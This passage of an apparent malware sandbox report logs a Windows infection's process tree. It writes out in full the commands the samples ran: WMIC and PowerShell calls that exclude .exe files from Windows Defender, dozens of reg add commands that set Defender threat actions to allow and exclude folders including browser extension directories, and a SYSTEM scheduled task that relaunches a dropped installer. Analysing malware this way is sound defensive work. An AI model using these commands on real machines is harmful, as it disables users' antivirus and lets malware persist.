        
        PID:7144
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6028
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:6320
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:6600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6720
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3480
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bVxDcMagaMCWGEtnSM" /SC once /ST 19:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS59E3.tmp\Install.exe\" 2x /dqdidbI 525403 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:7052
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 1112
        6⤵
        Program crash
        
        PID:6492
- - C:\Users\Admin\Documents\piratemamm\CQCAwvBV_Eku5MgaN1CIN8WN.exe
    C:\Users\Admin\Documents\piratemamm\CQCAwvBV_Eku5MgaN1CIN8WN.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3980
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      PID:4852
- - C:\Users\Admin\Documents\piratemamm\jXYin0381nFHJ9ws6DquTxgv.exe
    C:\Users\Admin\Documents\piratemamm\jXYin0381nFHJ9ws6DquTxgv.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3164
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:3560
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AFHJJEHIEBKK" & exit
        5⤵
        
        PID:3100
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:6464
- - C:\Users\Admin\Documents\piratemamm\VJYIyuiADO0D52ngpgOKwbKs.exe
    C:\Users\Admin\Documents\piratemamm\VJYIyuiADO0D52ngpgOKwbKs.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4408
  - - C:\Users\Admin\AppData\Local\Temp\is-P6IEG.tmp\VJYIyuiADO0D52ngpgOKwbKs.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-P6IEG.tmp\VJYIyuiADO0D52ngpgOKwbKs.tmp" /SL5="$802CA,3720726,54272,C:\Users\Admin\Documents\piratemamm\VJYIyuiADO0D52ngpgOKwbKs.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:4368
    - - C:\Users\Admin\AppData\Local\Quality MP3 Modifier\qualitymp3modifier32_64.exe
        
        "C:\Users\Admin\AppData\Local\Quality MP3 Modifier\qualitymp3modifier32_64.exe" -i
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3388
    - - C:\Users\Admin\AppData\Local\Quality MP3 Modifier\qualitymp3modifier32_64.exe
        
        "C:\Users\Admin\AppData\Local\Quality MP3 Modifier\qualitymp3modifier32_64.exe" -s
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4732
- - C:\Users\Admin\Documents\piratemamm\wvXbn2WQZ6IWXm65CGJg6ITJ.exe
    C:\Users\Admin\Documents\piratemamm\wvXbn2WQZ6IWXm65CGJg6ITJ.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2040
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2224

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:5800

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6256 -ip 6256
1⤵
PID:6796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\7zS59E3.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS59E3.tmp\Install.exe 2x /dqdidbI 525403 /S
1⤵
PID:5168
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5860
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:3572
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:384
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2904
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:4684
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:336
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2228
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:4452
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:3208
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2912
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:7164
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:6208
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5196
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    PID:5564
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5784
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5388
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6420
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7040
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:1060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6828
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5248
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6728
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YvREReDnvuUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YvREReDnvuUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eSZVwhDuipfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eSZVwhDuipfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fkrzaJYfU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fkrzaJYfU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ksrpDeExrbNyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ksrpDeExrbNyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VPXvovUKlRyvohVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VPXvovUKlRyvohVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\GTQqDGwYWbPvVFKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\GTQqDGwYWbPvVFKR\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:6540
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7044
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSZVwhDuipfU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSZVwhDuipfU2" /t REG_DWORD /d 0 /reg:64
    3⤵
